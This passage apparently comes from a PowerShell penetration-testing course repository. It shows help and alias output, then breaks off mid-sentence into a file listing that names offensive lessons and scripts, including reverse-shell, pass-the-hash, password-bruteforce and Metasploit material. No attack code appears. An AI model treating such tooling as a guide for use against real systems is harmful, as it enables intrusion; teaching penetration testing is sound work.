about_Throw HelpFile Describes the Throw keyword, which generates a terminating error.
about_transactions HelpFile Describes how to manage transacted operations in Windows PowerShell.
about_trap HelpFile Describes a keyword that handles a terminating error.
about_try_catch_finally HelpFile Describes how to use the Try, Catch, and Finally blocks to handle
about_types.ps1xml HelpFile Explains how the Types.ps1xml files let you extend the Microsoft .NET
about_type_operators HelpFile Describes the operators that work with Microsoft .NET Framework types.
about_Variables HelpFile Describes how variables store values that can be used in Windows
about_While HelpFile Describes a language statement that you can use to run a command block
about_wildcards HelpFile Describes how to use wildcard characters in Windows PowerShell.
about_Windows_PowerShell_2.0 HelpFile Describes the new features that are included in Windows PowerShell 2.0.
about_Windows_PowerShell_ISE HelpFile Describes the features and system requirements of Windows PowerShell
about_WMI_Cmdlets HelpFile Provides background information about Windows Management Instrumentation
about_WS-Management_Cmdlets HelpFile Provides an overview of Web Services for Management (WS-Management) as
default HelpFile Displays help about Windows PowerShell cmdlets and concepts.
PS C:\>
```
- Get all ```powershell``` help topics for ```process```
```Powershell
PS C:\> Get-Help *process
Name Category Synopsis
---- -------- --------
Get-Process Cmdlet Gets the processes that are running on the local computer or a remote co...
Stop-Process Cmdlet Stops one or more running processes.
Wait-Process Cmdlet Waits for the processes to be stopped before accepting more input.
Debug-Process Cmdlet Debugs one or more processes running on the local computer.
Start-Process Cmdlet Starts one or more processes on the local computer.
PS C:\>
```
- ```Get-Process``` Cmdlet
```Powershell
PS C:\> Get-Process
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
109 5 14812 9284 43 996 audiodg
52 3 1600 4688 46 0.44 2588 conhost
452 5 1092 2584 33 344 csrss
178 6 1080 3124 31 400 csrss
68 4 964 3080 39 0.03 300 dwm
695 21 23220 25500 166 1.38 356 explorer
0 0 0 12 0 0 Idle
41 3 1672 2980 53 0.00 332 jusched
756 13 2860 7264 35 492 lsass
144 4 1048 2540 14 500 lsm
75 4 1312 3752 31 3528 mscorsvw
413 10 81340 81328 218 1.83 2580 powershell
576 13 11580 5804 80 1180 SearchIndexer
217 7 4004 5388 35 484 services
29 1 212 628 4 268 smss
285 10 4468 6516 58 1332 spoolsv
140 4 1768 3728 28 1516 sppsvc
353 7 2460 5292 34 608 svchost
276 8 1996 4380 26 720 svchost
561 13 14644 12140 77 772 svchost
529 13 22324 29264 100 892 svchost
1239 35 20608 23608 127 932 svchost
498 17 5776 9092 50 1100 svchost
378 13 7728 8008 55 1228 svchost
318 25 8292 8060 47 1368 svchost
344 15 4952 8300 67 1460 svchost
96 7 1068 3392 25 1820 svchost
71 4 964 3560 22 2056 svchost
349 37 7504 8204 63 2364 svchost
400 34 143888 48300 208 3556 svchost
592 0 44 1416 3 4 System
146 8 2120 4372 40 0.03 2028 taskhost
327 10 8012 14516 82 3944 TrustedInstaller
115 5 1444 3524 45 668 VBoxService
139 6 1328 4308 62 0.04 1612 VBoxTray
123 5 1416 4744 28 2348 VSSVC
74 5 808 2904 32 392 wininit
111 4 1524 3668 39 440 winlogon
113 4 1712 3952 26 2524 WmiPrvSE
172 6 3152 6856 37 3820 WmiPrvSE
428 15 7364 14860 108 2088 wmpnetwk
98 5 1356 4680 45 4048 WuSetupV
PS C:\>
```
- Get all ```powershell``` help topics for ```alias```
```Powershell
PS C:\> Get-Help *alias*
Name Category Synopsis
---- -------- --------
Export-Alias Cmdlet Exports information about currently defined aliases to a file.
Get-Alias Cmdlet Gets the aliases for the current session.
Import-Alias Cmdlet Imports an alias list from a file.
New-Alias Cmdlet Creates a new alias.
Set-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma...
Alias Provider Provides access to the Windows PowerShell aliases and the values that th...
about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows
PS C:\>
```
- ```Get-Alias``` Cmdlet
```Powershell
PS C:\> Get-Alias
CommandType Name Definition
----------- ---- ----------
Alias % ForEach-Object
Alias ? Where-Object
Alias ac Add-Content
Alias asnp Add-PSSnapIn
Alias cat Get-Content
Alias cd Set-Location
Alias chdir Set-Location
Alias clc Clear-Content
Alias clear Clear-Host
Alias clhy Clear-History
Alias cli Clear-Item
Alias clp Clear-ItemProperty
Alias cls Clear-Host
Alias clv Clear-Variable
Alias compare Compare-Object
Alias copy Copy-Item
Alias cp Copy-Item
Alias cpi Copy-Item
Alias cpp Copy-ItemProperty
Alias cvpa Convert-Path
Alias dbp Disable-PSBreakpoint
Alias del Remove-Item
Alias diff Compare-Object
Alias dir Get-ChildItem
Alias ebp Enable-PSBreakpoint
Alias echo Write-Output
Alias epal Export-Alias
Alias epcsv Export-Csv
Alias epsn Export-PSSession
Alias erase Remove-Item
Alias etsn Enter-PSSession
Alias exsn Exit-PSSession
Alias fc Format-Custom
Alias fl Format-List
Alias foreach ForEach-Object
Alias ft Format-Table
Alias fw Format-Wide
Alias gal Get-Alias
Alias gbp Get-PSBreakpoint
Alias gc Get-Content
Alias gci Get-ChildItem
Alias gcm Get-Command
Alias gcs Get-PSCallStack
Alias gdr Get-PSDrive
Alias ghy Get-History
Alias gi Get-Item
Alias gjb Get-Job
Alias gl Get-Location
Alias gm Get-Member
Alias gmo Get-Module
Alias gp Get-ItemProperty
Alias gps Get-Process
Alias group Group-Object
Alias gsn Get-PSSession
Alias gsnp Get-PSSnapIn
Alias gsv Get-Service
Alias gu Get-Unique
Alias gv Get-Variable
Alias gwmi Get-WmiObject
Alias h Get-History
Alias history Get-History
Alias icm Invoke-Command
Alias iex Invoke-Expression
Alias ihy Invoke-History
Alias ii Invoke-Item
Alias ipal Import-Alias
Alias ipcsv Import-Csv
Alias ipmo Import-Module
Alias ipsn Import-PSSession
Alias ise powershell_ise.exe
Alias iwmi Invoke-WMIMethod
Alias kill Stop-Process
Alias lp Out-Printer
Alias ls Get-ChildItem
Alias man help
Alias md mkdir
Alias measure Measure-Object
Alias mi Move-Item
Alias mount New-PSDrive
Alias move Move-Item
Alias mp Move-ItemProperty
Alias mv Move-Item
Alias nal New-Alias
Alias ndr New-PSDrive
Alias ni New-Item
Alias nmo New-Module
Alias nsn New-PSSession
Alias nv New-Variable
Alias ogv Out-GridView
Alias oh Out-Host
Alias popd Pop-Location
Alias ps Get-Process
Alias pushd Push-Location
Alias pwd Get-Location
Alias r Invoke-History
Alias rbp Remove-PSBreakpoint
Alias rcjb Receive-Job
Alias rd Remove-Item
Alias rdr Remove-PSDrive
Alias ren Rename-Item
Alias ri Remove-Item
Alias rjb Remove-Job
Alias rm Remove-Item
Alias rmdir Remove-Item
Alias rmo Remove-Module
Alias rni Rename-Item
Alias rnp Rename-ItemProperty
Alias rp Remove-ItemProperty
Alias rsn Remove-PSSession
Alias rsnp Remove-PSSnapin
Alias rv Remove-Variable
Alias rvpa Resolve-Path
Alias rwmi Remove-WMIObject
Alias sajb Start-Job
Alias sal Set-Alias
Alias saps Start-Process
Alias sasv Start-Service
Alias sbp Set-PSBreakpoint
Alias sc Set-Content
Alias select Select-Object
Alias set Set-Variable
Alias si Set-Item
Alias sl Set-Location
Alias sleep Start-Sleep
Alias sort Sort-Object
Alias sp Set-ItemProperty
Alias spjb Stop-Job
Alias spps Stop-Process
Alias spsv Stop-Service
Alias start Start-Process
Alias sv Set-Variable
Alias swmi Set-WMIInstance
Alias tee Tee-Object
Alias type Get-Content
Alias where Where-Object
Alias wjb Wait-Job
Alias write Write-Output
PS C:\>
```
- Examples of ```Get-Help```
```Powershell
PS C:\> Get-Help Get-Help -Examples
NAME
Get-Help
SYNOPSIS
Displays information about Windows PowerShell commands and concepts.
-------------------------- EXAMPLE 1 --------------------------
C:\PS>get-help
Description
-----------
This command displays help about the Windows PowerShell help system.
-------------------------- EXAMPLE 2 --------------------------
C:\PS>get-help *
Description
-----------
This command displays a list of all help files in the Windows PowerShell help system.
-------------------------- EXAMPLE 3 --------------------------
C:\PS>get-help get-alias
C:\PS>help get-alias
C:\PS>get-alias -?
Description
-----------
These commands display basic information about the get-alias cmdlet. The "Get-Help" and "-?" commands display the i
nformation on a single page. The "Help" command displays the information one page at a time.
-------------------------- EXAMPLE 4 --------------------------
C:\PS>get-help about_*
Description
-----------
This command displays a list of the conceptual topics included in Windows PowerShell help. All of these topics begi
n with the characters "about_". To display a particular help file, type "get-help <topic-name>, for example, "get-h
elp about_signing".
-------------------------- EXAMPLE 5 --------------------------
C:\PS>get-help ls -detailed
Description
-----------
This command displays detailed help for the Get-ChildItem cmdlet by specifying one of its aliases, "ls." The Detail
ed parameter requests the detailed view of the help file, which includes parameter descriptions and examples. To se
e the complete help file for a cmdlet, use the Full parameter.
-------------------------- EXAMPLE 6 --------------------------
C:\PS>get-help format-string -full
Description
-----------
This command displays the full view help for the Format-String cmdlet. The full view of help includes parameter des
criptions, examples, and a table of technical details about the parameters.
-------------------------- EXAMPLE 7 --------------------------
C:\PS>get-help start-service -examples
Description
-----------
This command displays examples of using start-service in Windows PowerShell commands.
-------------------------- EXAMPLE 8 --------------------------
C:\PS>get-help get-childitem -parameter f*
Description
-----------
This command displays descriptions of the parameters of the Get-ChildItem cmdlet that begin with "f" (filter and fo
rce). For descriptions of all parameters, type "get-help get-childitem parameter*".
-------------------------- EXAMPLE 9 --------------------------
C:\PS>(get-help write-output).syntax
Description
-----------
This command displays only the syntax of the Write-Output cmdlet.
Syntax is one of many properties of help objects; others are description, details, examples, and parameters. To fin
d all properties and methods of help objects, type "get-help <cmdlet-name> | get-member"; for example, "get-help st
art-service | get member".
-------------------------- EXAMPLE 10 --------------------------
C:\PS>(get-help trace-command).alertset
Description
-----------
This command displays the notes about the cmdlet. The notes are stored in the alertSet property of the help object.
The notes include conceptual information and tips for using the cmdlet. By default, the notes are displayed only wh
en you use the Full parameter of Get-Help, but you can also display them by using the alertSet property.
-------------------------- EXAMPLE 11 --------------------------
C:\PS>get-help add-member -full | out-string -stream | select-string -pattern clixml
Description
-----------
This example shows how to search for a word in particular cmdlet help topic. This command searches for the word "cl
ixml" in the full version of the help topic for the Add-Member cmdlet.
Because the Get-Help cmdlet generates a MamlCommandHelpInfo object, not a string, you need to use a command that tr
ansforms the help topic content into a string, such as Out-String or Out-File.
-------------------------- EXAMPLE 12 --------------------------
C:\PS>get-help get-member -online
Description
-----------
This command displays the online version of the help topic for the Get-Member cmdlet.
-------------------------- EXAMPLE 13 --------------------------
C:\PS>get-help remoting
Description
-----------
This command displays a list of topics that include the word "remoting" in their contents.
When you enter a word that does not appear in any topic title, Get-Help displays a list of topics that include that
word.
-------------------------- EXAMPLE 14 --------------------------
C:\PS>get-help get-item -path SQLSERVER:\DataCollection
NAME
Get-Item
SYNOPSIS
Gets a collection of Server objects for the local computer and any computers to which you have made a SQL Serve
r PowerShell connection.
...
C:\PS> cd SQLSERVER:\DataCollection
C:\PS> SQLSERVER:\DataCollection> get-help get-item
NAME
Get-Item
SYNOPSIS
Gets a collection of Server objects for the local computer and any computers to which you have made a SQL Serve
r PowerShell connection.
...
C:\PS> Get-Item
NAME
Get-Item
SYNOPSIS
Gets the item at the specified location.
...
Description
-----------
This example shows how to get help for the Get-Item cmdlet that explains how to use the cmdlet in the DataCollectio
n node of the Windows PowerShell SQL Server provider.
The example shows two ways of getting the custom help for Get-Item.
The first command uses the Path parameter of Get-Help to specify the provider path. This command can be entered at
any path location.
The second command uses the Set-Location cmdlet (alias = "cd") to go to the provider path. From that location, even
without the Path parameter, the Get-Help command gets the custom help for the provider path.
The third command shows that a Get-Help command in a file system path, and without the Path parameter, gets the sta
ndard help for the Get-Item cmdlet.
-------------------------- EXAMPLE 15 --------------------------
C:\PS>get-help c:\ps-test\MyScript.ps1
Description
-----------
This command gets help for the MyScript.ps1 script. For information about writing help for your functions and scrip
ts, see about_Comment_Based_Help.
PS C:\>
```
- Get all ```powershell``` help topics for ```alias```
```Powershell
PS C:\> Get-Help *alias*
Name Category Synopsis
---- -------- --------
Export-Alias Cmdlet Exports information about currently defined aliases to a file.
Get-Alias Cmdlet Gets the aliases for the current session.
Import-Alias Cmdlet Imports an alias list from a file.
New-Alias Cmdlet Creates a new alias.
Set-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma...
Alias Provider Provides access to the Windows PowerShell aliases and the values that th...
about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows
PS C:\>
```
- Getting help for ```about_aliases```
```Powershell
PS C:\> Get-Help about_aliases
TOPIC
about_aliases
SHORT DESCRIPTION
Describes how to use alternate names for cmdlets and commands in Windows
PowerShell.
LONG DESCRIPTION
An alias is an alternate name or nickname for a cmdlet or for a command
element, such as a function, script, file, or executable file. You
can use the alias instead of the command name in any Windows PowerShell
commands.
To create an alias, use the New-Alias cmdlet. For example, the following
command creates the "gas" alias for the Get-AuthenticodeSignature cmdlet:
new-alias -name gas -value Get-AuthenticodeSignature
After you create the alias for the cmdlet name, you can use the alias
instead of the cmdlet name. For example, to get the Authenticode signature
for the SqlScript.ps1 file, type:
get-authenticodesignature sqlscript.ps1
Or, type:
gas sqlscript.ps1
If you create "word" as the alias for Microsoft Office Word, you can type
"word" instead of the following:
"c:\program files\microsoft office\office11\winword.exe"
BUILT-IN ALIASES
Windows PowerShell includes a set of built-in aliases, including "cd" and
"chdir" for the Set-Location cmdlet, and "ls" and "dir" for the
Get-ChildItem cmdlet.
To get all the aliases on the computer, including the built-in aliases,
type:
get-alias
ALIAS CMDLETS
Windows PowerShell includes the following cmdlets, which are designed for
working with aliases:
- Get-Alias. Gets all the aliases in the current session.
- New-Alias. Creates a new alias.
- Set-Alias. Creates or changes an alias.
- Export-Alias. Exports one or more aliases to a file.
- Import-Alias. Imports an alias file into Windows PowerShell.
For detailed information about the cmdlets, type:
get-help <cmdlet-name> -detailed
For example, type:
get-help export-alias -detailed
CREATING AN ALIAS
To create a new alias, use the New-Alias cmdlet. For example, to create the
"gh" alias for Get-Help, type:
new-alias -name gh -value get-help
You can use the alias in commands, just as you would use the full cmdlet
name, and you can use the alias with parameters.
For example, to get detailed Help for the Get-WmiObject cmdlet, type:
get-help get-wmiobject -detailed
Or, type:
gh get-wmiobject -detailed
SAVING ALIASES
The aliases that you create are saved only in the current session. To use
the aliases in a different session, add the alias to your Windows
PowerShell profile. Or, use the Export-Alias cmdlet to save the aliases to
a file.
For more information, type:
get-help about_profile
GETTING ALIASES
To get all the aliases in the current session, including the built-in
aliases, the aliases in your Windows PowerShell profiles, and the aliases
that you have created in the current session, type:
get-alias
To get particular aliases, use the Name parameter of the Get-Alias cmdlet.
For example, to get aliases that begin with "p", type:
get-alias -name p*
To get the aliases for a particular item, use the Definition parameter.
For example, to get the aliases for the Get-ChildItem cmdlet type:
get-alias -definition Get-ChildItem
ALTERNATE NAMES FOR COMMANDS WITH PARAMETERS
You can assign an alias to a cmdlet, script, function, or executable file.
However, you cannot assign an alias to a command and its parameters.
For example, you can assign an alias to the Get-EventLog cmdlet, but you
cannot assign an alias to the "get-eventlog -logname system" command.
However, you can create a function that includes the command. To create a
function, type the word "function" followed by a name for the function.
Type the command, and enclose it in braces ({}).
For example, the following command creates the syslog function. This
function represents the "get-eventlog -logname system" command:
function syslog {get-eventlog -logname system}
You can now type "syslog" instead of the command. And, you can create
aliases for the syslog function.
For more information about functions, type:
get-help about_functions
ALIAS OBJECTS
Windows PowerShell aliases are represented by objects that are instances
of the System.Management.Automation.AliasInfo class. For more information
about this type of object, see "AliasInfo Class" in the Microsoft
Developer Network (MSDN) library at
http://go.microsoft.com/fwlink/?LinkId=143644.
To view the properties and methods of the alias objects, get the
aliases. Then, pipe them to the Get-Member cmdlet. For example:
get-alias | get-member
To view the values of the properties of a specific alias, such as the
"dir" alias, get the alias. Then, pipe it to the Format-List cmdlet. For
example, the following command gets the "dir" alias. Next, the command
pipes the alias to the Format-List cmdlet. Then, the command uses the
Property parameter of Format-List with a wildcard character (*) to display
all the properties of the "dir" alias. The following command performs
these tasks:
get-alias -name dir | format-list -property *
WINDOWS POWERSHELL ALIAS PROVIDER
Windows PowerShell includes the Alias provider. The Alias provider lets you
view the aliases in Windows PowerShell as though they were on a file system
drive.
The Alias provider exposes the Alias: drive. To go into the Alias: drive,
type:
set-location alias:
To view the contents of the drive, type:
get-childitem
To view the contents of the drive from another Windows PowerShell drive,
begin the path with the drive name. Include the colon (:). For example:
get-childitem -path alias:
To get information about a particular alias, type the drive name and
the alias name. Or, type a name pattern. For example, to get all the
aliases that begin with "p", type:
get-childitem -path alias:p*
For more information about the Windows PowerShell Alias provider,
type:
get-help alias-psprovider
SEE ALSO
new-alias
get-alias
set-alias
export-alias
import-alias
get-psprovider
get-psdrive
about_functions
about_profiles
about_providers
PS C:\>
```
###### Exercise
- Use ```Get-Help``` to retrieve help about ```Get-Command```.
```Powershell
PS C:\Users\Windows-32> Get-Help Get-Command
NAME
Get-Command
SYNOPSIS
Gets basic information about cmdlets and other elements of Windows PowerShell commands.
SYNTAX
Get-Command [[-Name] <string[]>] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application |
Script | All}] [[-ArgumentList] <Object[]>] [-Module <string[]>] [-Syntax] [-TotalCount <int>] [<CommonParameters>
]
Get-Command [-Noun <string[]>] [-Verb <string[]>] [[-ArgumentList] <Object[]>] [-Module <string[]>] [-Syntax] [-Tot
alCount <int>] [<CommonParameters>]
DESCRIPTION
The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th
e session, such as aliases, functions, filters, scripts, and applications.
Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge
ts its information from help topic files.
Without parameters, "Get-Command" gets all of the cmdlets and functions in the current session. "Get-Command *" get
s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en
v:path). It groups the files in the "Application" command type.
You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win
dows PowerShell snap-in or importing a module.
RELATED LINKS
Online version: http://go.microsoft.com/fwlink/?LinkID=113309
about_Command_Precedence
Get-Help
Get-PSDrive
Get-Member
Import-PSSession
Export-PSSession
REMARKS
To see the examples, type: "get-help Get-Command -examples".
For more information, type: "get-help Get-Command -detailed".
For technical information, type: "get-help Get-Command -full".
PS C:\Users\Windows-32>
```
- Use Get-Help ```about_<topic>``` to retrieve help about ```powershell.exe```.
```Powershell
PS C:\Users\Windows-32> Get-Help about*
Name Category Synopsis
---- -------- --------
about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows
about_Arithmetic_Operators HelpFile Describes the operators that perform arithmetic in Windows PowerShell.
about_arrays HelpFile Describes a compact data structure for storing data elements.
about_Assignment_Operators HelpFile Describes how to use operators to assign values to variables.
about_Automatic_Variables HelpFile Describes variables that store state information for Windows PowerShell.
about_Break HelpFile Describes a statement you can use to immediately exit Foreach, For, While,
about_command_precedence HelpFile Describes how Windows PowerShell determines which command to run.
about_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help.
about_Comment_Based_Help HelpFile Describes how to write comment-based Help topics for functions and scripts.
about_CommonParameters HelpFile Describes the parameters that can be used with any cmdlet.
about_Comparison_Operators HelpFile Describes the operators that compare values in Windows PowerShell.
about_Continue HelpFile Describes how the Continue statement immediately returns the program flow
about_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell
about_data_sections HelpFile Explains Data sections, which isolate text strings and other read-only
about_debuggers HelpFile Describes the Windows PowerShell debugger.
about_do HelpFile Runs a statement list one or more times, subject to a While or Until
about_environment_variables HelpFile Describes how to access Windows environment variables in Windows
about_escape_characters HelpFile Introduces the escape character in Windows PowerShell and explains
about_eventlogs HelpFile Windows PowerShell creates a Windows event log that is
about_execution_policies HelpFile Describes the Windows PowerShell execution policies and explains
about_For HelpFile Describes a language command you can use to run statements based on a
about_Foreach HelpFile Describes a language command you can use to traverse all the items in a
about_format.ps1xml HelpFile The Format.ps1xml files in Windows PowerShell define the default display
about_functions HelpFile Describes how to create and use functions in Windows PowerShell.
about_functions_advanced HelpFile Introduces advanced functions that act similar to cmdlets.
about_functions_advanced_methods HelpFile Describes how functions that specify the CmdletBinding attribute can use
about_functions_advanced_param... HelpFile Explains how to add static and dynamic parameters to functions that declare
about_functions_cmdletbindinga... HelpFile Describes an attribute that declares a function that acts similar to a
about_hash_tables HelpFile Describes how to create, use, and sort hash tables in Windows PowerShell.
about_History HelpFile Describes how to retrieve and run commands in the command history.
about_If HelpFile Describes a language command you can use to run statement lists based
about_jobs HelpFile Provides information about how Windows PowerShell background jobs run a
about_job_details HelpFile Provides details about background jobs on local and remote computers.
about_join HelpFile Describes how the join operator (-join) combines multiple strings into a
about_Language_Keywords HelpFile Describes the keywords in the Windows PowerShell scripting language.
about_Line_Editing HelpFile Describes how to edit commands at the Windows PowerShell command prompt.
about_locations HelpFile Describes how to access items from the working location in Windows
about_logical_operators HelpFile Describes the operators that connect statements in Windows PowerShell.
about_methods HelpFile Describes how to use methods to perform actions on objects in Windows
about_modules HelpFile Explains how to install, import, and use Windows PowerShell modules.
about_objects HelpFile Provides essential information about objects in Windows PowerShell.
about_operators HelpFile Describes the operators that are supported by Windows PowerShell.
about_parameters HelpFile Describes how to work with cmdlet parameters in Windows PowerShell.
about_Parsing HelpFile Describes how Windows PowerShell parses commands.
about_Path_Syntax HelpFile Describes the full and relative path name formats in Windows PowerShell.
about_pipelines HelpFile Combining commands into pipelines in the Windows PowerShell
about_preference_variables HelpFile Variables that customize the behavior of Windows PowerShell
about_profiles HelpFile Describes how to create and use a Windows PowerShell profile.
about_prompts HelpFile Describes the Prompt function and demonstrates how to create a custom
about_properties HelpFile Describes how to use object properties in Windows PowerShell.
about_providers HelpFile Describes how Windows PowerShell providers provide access to data and
about_pssessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to
about_pssession_details HelpFile Provides detailed information about Windows PowerShell sessions and the
about_PSSnapins HelpFile Describes Windows PowerShell snap-ins and shows how to use and manage them.
about_Quoting_Rules HelpFile Describes rules for using single and double quotation marks
about_Redirection HelpFile Describes how to redirect output from Windows PowerShell to text files.
about_Ref HelpFile Describes how to create and use a reference variable type.
about_regular_expressions HelpFile Describes regular expressions in Windows PowerShell.
about_remote HelpFile Describes how to run remote commands in Windows PowerShell.
about_remote_FAQ HelpFile Contains questions and answers about running remote commands
about_remote_jobs HelpFile Describes how to run background jobs on remote computers.
about_remote_output HelpFile Describes how to interpret and format the output of remote commands.
about_remote_requirements HelpFile Describes the system requirements and configuration requirements for
about_remote_troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell.
about_requires HelpFile Prevents a script from running by requiring the specified snap-ins and
about_Reserved_Words HelpFile Lists the reserved words that cannot be used as identifiers because they
about_Return HelpFile Exits the current scope, which can be a function, script, or script block.
about_scopes HelpFile Explains the concept of scope in Windows PowerShell and shows how to set
about_scripts HelpFile Describes how to write and run scripts in Windows PowerShell.
about_script_blocks HelpFile Defines what a script block is and explains how to use script blocks in
about_script_internationalization HelpFile Describes the script internationalization features of Windows PowerShell...
about_Session_Configurations HelpFile Describes session configurations, which determine the users who can
about_Signing HelpFile Explains to how sign scripts so that they comply with the Windows
about_Special_Characters HelpFile Describes the special characters that you can use to control how
about_split HelpFile Explains how to use the split operator to split one or more strings into
about_Switch HelpFile Explains how to use a switch to handle multiple If statements.
about_Throw HelpFile Describes the Throw keyword, which generates a terminating error.
about_transactions HelpFile Describes how to manage transacted operations in Windows PowerShell.
about_trap HelpFile Describes a keyword that handles a terminating error.
about_try_catch_finally HelpFile Describes how to use the Try, Catch, and Finally blocks to handle
about_types.ps1xml HelpFile Explains how the Types.ps1xml files let you extend the Microsoft .NET
about_type_operators HelpFile Describes the operators that work with Microsoft .NET Framework types.
about_Variables HelpFile Describes how variables store values that can be used in Windows
about_While HelpFile Describes a language statement that you can use to run a command block
about_wildcards HelpFile Describes how to use wildcard characters in Windows PowerShell.
about_Windows_PowerShell_2.0 HelpFile Describes the new features that are included in Windows PowerShell 2.0.
about_Windows_PowerShell_ISE HelpFile Describes the features and system requirements of Windows PowerShell
about_WMI_Cmdlets HelpFile Provides background information about Windows Management Instrumentation
about_WS-Management_Cmdlets HelpFile Provides an overview of Web Services for Management (WS-Management) as
PS C:\Users\Windows-32>
```
```Powershell
PS C:\Users\Windows-32> Get-Help about_Windows_PowerShell_2.0
TOPIC
about_Windows_PowerShell_2.0
SHORT DESCRIPTION
Describes the new features that are included in Windows PowerShell 2.0.
LONG DESCRIPTION
Windows PowerShell 2.0 includes several significant features that
extend its use, improve its usability, and allow you to control and
manage Windows-based environments more easily and comprehensively.
Windows PowerShell 2.0 is backward compatible. Cmdlets, providers,
snap-ins, scripts, functions, and profiles that were designed for Windows
PowerShell 1.0 work in Windows PowerShell 2.0 without changes.
NEW FEATURES
Windows PowerShell 2.0 includes the following new features.
Remoting
Windows PowerShell 2.0 lets you run commands on one or many remote
computers with a single Windows PowerShell command. You can run
individual commands, or you can create a persistent connection
(a session) to run a series of related commands. You can also start a
session with a remote computer so that the commands you type run
directly on the remote computer.
The remoting features of Windows PowerShell are built on Windows
Remote Management (WinRM). WinRM is the Microsoft implementation of
the WS-Management protocol, a standard SOAP-based, firewall-compatible
communications protocol.
The remote computers must have Windows PowerShell 2.0, the Microsoft .NET
Framework 2.0, and the WinRM service. Remote commands are supported
on all operating systems that can run Windows PowerShell. The
current user must have permission to run commands on the remote
computers. For more information, see about_Remote_Requirements.
To support remoting, the Invoke-Command, Enter-PSSession, and
Exit-PSSession cmdlets have been added, along with other cmdlets
that contain the PSSession noun. These cmdlets let you create and manage
persistent connections.
The ComputerName parameter has also been added to several cmdlets,
including the Get-Process, Get-Service, and Get-Eventlog cmdlets. This
parameter allows you to get information about remote computers.
These cmdlets use .NET Framework methods to get their data,
so they do not rely on Windows PowerShell remoting. They do not require
any new
gitextract_hail4owi/ ├── .gitignore ├── 1-Course-Introduction.md ├── 10-Loop-Statements-in-Powershell.md ├── 11-Basics-of-Powershell-Scripting.md ├── 12-Functions-in-Powershell-Part-1.md ├── 13-Functions-in-Powershell-Part-2.md ├── 14-Functions-in-Powershell-Part-3.md ├── 15-Advanced-Functions-in-Powershell.md ├── 16-Advanced-Scripting-with-Powershell.md ├── 17-Module-in-Powershell-Part-1.md ├── 18-Modules-in-Powershell-Part-2.md ├── 19-Modules-in-Powershell-Part-3.md ├── 2-Introduction-to-Powershell.md ├── 20-Remoting-Part-1.md ├── 21-Remoting-Part-2.md ├── 22-Powershell-Remoting-Part-3.md ├── 23-Powershell-Remoting-Part-4.md ├── 24-Powershell-Remoting-Part-5.md ├── 25-Powershell-Remoting-Part-6.md ├── 26-Jobs-in-Powershell.md ├── 27-Using-NET-in-Powershell-Part-1.md ├── 28-Using-NET-in-Powershell-Part-2.md ├── 29-Using-NET-in-Powershell-Part-3.md ├── 3-Exploring-and-using-Cmdlets.md ├── 30-Using-NET-in-Powershell-Part-4.md ├── 31-Using-NET-in-Powershell-Part-5.md ├── 32-Using-WMI-in-Powershell-Part-1.md ├── 33-Using-WMI-in-Powershell-Part-2.md ├── 34-Using-WMI-in-Powershell-Part-3.md ├── 35-COM-and-Powershell.md ├── 36-Registry-and-Powershell-Part-1.md ├── 37-Registry-and-Powershell-Part-2.md ├── 38-Registry-and-Powershell-Part-3.md ├── 39-Pentest-Methodology.md ├── 4-Output-Formatting.md ├── 40-Recon-and-Scanning-Part-1.md ├── 41-Recon-and-Scanning-Part-2.md ├── 42-Vulnerability-Scanning-and-Analysis.md ├── 43-Bruteforce-Part-1.md ├── 44-Bruteforce-Part-2.md ├── 45-Exploitation-Executing-Scripts-on-MySQL.md ├── 46-Client-Side-Attacks-Part-1.md ├── 47-Client-Side-Attacks-Part-2.md ├── 48-Client-Side-Attacks-Part-3.md ├── 49-Client-Side-Attacks-Part-4.md ├── 5-Operators.md ├── 50-PHPMyAdmin-Part-1.md ├── 51-PHPMyAdmin-Part-2.md ├── 52-Metasploit-Part-1.md ├── 53-Metasploit-Part-2.md ├── 6-Advanced-Operators.md ├── 7-Types-in-Powershell.md ├── 8-Arrays-in-Powershell.md ├── 9-Conditional-Statements-in-Powershell.md ├── Code/ │ ├── 11/ │ │ └── HelloWorld.ps1 │ ├── 15/ │ │ └── paramatrributes.ps1 │ ├── 16/ │ │ └── Show-AdvancedScript.ps1 │ ├── 18/ │ │ ├── Check-PassTheHash.psm1 │ │ └── Show-AdvancedScript.psm1 │ ├── 19/ │ │ └── Show-AdvancedScript.psd1 │ ├── 23/ │ │ └── Search-Sensitive.ps1 │ ├── 29/ │ │ └── Invoke-SysCommands.ps1 │ ├── 30/ │ │ └── Invoke-SysCommandsDLL.ps1 │ ├── 31/ │ │ └── New-SymLink.ps1 │ ├── 35/ │ │ └── Ie-Com.ps1 │ ├── 41/ │ │ ├── Get-DefaultPage.ps1 │ │ └── ip.txt │ ├── 42/ │ │ └── Start-AutoNmap.ps1 │ ├── 44/ │ │ └── Get-WinRMPassword.ps1 │ ├── 47/ │ │ └── mini-reverse.ps1 │ ├── 49/ │ │ └── Out-ShortcutModified.ps1 │ └── 51/ │ ├── Convert-Dll.ps1 │ └── lib_mysqludf_sys.dll_ └── README.md
Condensed preview — 74 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1,817K chars).
[
{
"path": ".gitignore",
"chars": 10,
"preview": ".DS_Store\n"
},
{
"path": "1-Course-Introduction.md",
"chars": 1269,
"preview": "#### 1. Course Introduction\n\n- [Nishang](https://github.com/samratashok/nishang) ✅\n\nHelps in using ```PowerShell``` for "
},
{
"path": "10-Loop-Statements-in-Powershell.md",
"chars": 3450,
"preview": "#### 10. Loop Statements in Powershell\n\n###### Loop Statements\n\n- while() {}\n\n```PowerShell\nPS C:\\Users\\Windows-32> $cou"
},
{
"path": "11-Basics-of-Powershell-Scripting.md",
"chars": 14418,
